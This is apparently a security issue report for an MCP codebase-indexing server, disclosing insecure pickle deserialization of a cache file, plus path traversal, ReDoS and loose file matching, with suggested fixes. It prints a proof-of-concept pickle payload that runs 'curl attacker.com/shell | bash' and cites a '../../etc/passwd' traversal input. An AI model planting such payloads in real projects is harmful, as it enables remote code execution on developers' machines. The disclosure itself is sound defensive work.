Summary
The cache loading in server.py uses pickle.load() to deserialize .codebase-index-cache.pkl before any validation. Since pickle.load() executes arbitrary code at deserialization time, the isinstance() checks that follow offer zero protection.
Vulnerable code
# server.py lines ~183-201
def _load_cache(project_root: str) -> "ProjectIndex | None":
path = _cache_path(project_root)
if not os.path.exists(path):
return None
try:
with open(path, "rb") as f:
payload = pickle.load(f) # <-- code executes HERE
if not isinstance(payload, dict) or payload.get("version") != _CACHE_VERSION:
return None
index = payload["index"]
if not isinstance(index, PI):
return None
return index
Attack vector
Any process with write access to the project directory can plant a malicious .codebase-index-cache.pkl:
import pickle, os
class Exploit:
def __reduce__(self):
return (os.system, ("curl attacker.com/shell | bash",))
with open(".codebase-index-cache.pkl", "wb") as f:
pickle.dump({"version": 1, "index": Exploit()}, f)
On the next MCP server start (or first tool call), _ensure_index() -> _load_cache() runs the payload with the privileges of the MCP server process.
A malicious actor could also commit the file to a public repo — any developer who clones it and starts the MCP server would be exploited silently.
Suggested fix
Option A — Replace pickle with JSON (recommended): Serialize only the structural metadata (dicts, lists, strings, ints). Eliminates the attack surface entirely.
Option B — SafeUnpickler with allowlist:
import pickle
_SAFE_MODULES = {"mcp_codebase_index.models", "mcp_codebase_index.project_indexer"}
class SafeUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module not in _SAFE_MODULES:
raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
return super().find_class(module, name)
payload = SafeUnpickler(f).load()
Additional findings from the same audit
- ReDoS in
search_codebase (query_api.py): user-supplied regex applied to every line with no timeout. Mitigation: regex library with timeout=2.0 or signal.alarm.
- Path traversal in
reindex_file (project_indexer.py ~L186): ../../etc/passwd not validated against root. Fix: if rel_path.startswith(".."): raise ValueError.
- Ambiguous endswith matching in
_resolve_file (query_api.py ~L233): can return unintended files.
Environment
Discovered during a local security audit before production deployment. Cache files added to .gitignore as interim mitigation. Happy to submit a PR.
Summary
The cache loading in
server.pyusespickle.load()to deserialize.codebase-index-cache.pklbefore any validation. Sincepickle.load()executes arbitrary code at deserialization time, theisinstance()checks that follow offer zero protection.Vulnerable code
Attack vector
Any process with write access to the project directory can plant a malicious
.codebase-index-cache.pkl:On the next MCP server start (or first tool call),
_ensure_index() -> _load_cache()runs the payload with the privileges of the MCP server process.A malicious actor could also commit the file to a public repo — any developer who clones it and starts the MCP server would be exploited silently.
Suggested fix
Option A — Replace pickle with JSON (recommended): Serialize only the structural metadata (dicts, lists, strings, ints). Eliminates the attack surface entirely.
Option B — SafeUnpickler with allowlist:
Additional findings from the same audit
search_codebase(query_api.py): user-supplied regex applied to every line with no timeout. Mitigation:regexlibrary withtimeout=2.0orsignal.alarm.reindex_file(project_indexer.py ~L186):../../etc/passwdnot validated against root. Fix:if rel_path.startswith(".."): raise ValueError._resolve_file(query_api.py ~L233): can return unintended files.Environment
Discovered during a local security audit before production deployment. Cache files added to
.gitignoreas interim mitigation. Happy to submit a PR.